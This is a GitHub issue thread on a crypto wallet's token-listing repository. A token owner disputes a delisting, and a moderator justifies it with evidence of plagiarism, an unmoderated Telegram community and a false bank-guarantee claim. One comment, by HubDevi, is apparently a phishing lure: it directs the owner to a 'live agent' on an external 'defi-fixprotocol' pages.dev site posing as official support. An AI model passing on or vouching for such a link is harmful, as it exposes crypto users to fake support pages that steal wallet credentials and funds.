### ISSUE TITLE
Dear @Cryptocool1 @cryptomanz1

### ISSUE THREAD

**Issue by robertBrown377** [trustwallet/assets#28889]
Dear @Cryptocool1 @cryptomanz1,

We would like to know the reasons for delisting our token from your platform. If your move was due to suspicions of plagiarism, please clarify what kind of documents or evidence you need to provide to confirm the uniqueness of our token.

We thank you in advance for your response.

Regards,
Robert Brown
My Telegram @[robertBrown377 ](https://t.me/neyro_robert)

**Comment by robertBrown377** [comment]
@Cryptocool1 @cryptomanz1 please recheck

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)
Regards.

**Comment by robertBrown377** [comment]
Dear Trust Wallet team,
I recently noticed that my token issue was incorrectly listed on CoinMarketCap. Instead of the correct total supply of 200,000,000, it was listed as 20,000,000.
We have already submitted a request to correct the Self-reported circulating supply. Please note this change and make sure that we are not plagiarized
Thank you for your attention to this matter.
![image](https://github.com/user-attachments/assets/92df0bca-4daa-447c-8a8e-cbe0b0442c20)

**Comment by Jesjimenez** [comment]
Hola hhgñ

**Comment by robertBrown377** [comment]
@cryptomanz1

**Comment by curiouschonk** [comment]
Hi @robertBrown377 

As outlined in our [disclaimer](https://github.com/trustwallet/assets?tab=readme-ov-file#disclaimer), we reserve the right to take action on entries that pose a risk of fraud.

Regarding your concern about plagiarism, it appears you are already aware of this issue...
For the public's reference, here is an example of a relevant section

![image](https://github.com/user-attachments/assets/d1fe7f6b-5504-4bca-a451-fa3c81dd89e0)

Additionally, we have observed that your Telegram community is inadequately moderated, resulting in numerous malicious posts

<img width="300" alt="image" src="https://github.com/user-attachments/assets/3047003f-9862-4702-a445-03685dd6a7ff">

Furthermore, you are falsely claiming to have a bank guarantee with CoinMarketCap

<img width="1401" alt="image" src="https://github.com/user-attachments/assets/48ccab10-9fc7-4b86-ae70-263db830e37e">

<img width="400" alt="image" src="https://github.com/user-attachments/assets/7e4559e7-f806-49e0-ac38-66b027811a13">

We take these matters seriously and will continue to enforce our guidelines to maintain the integrity of our platform.

cc @Cryptocool1 @cryptomanz1
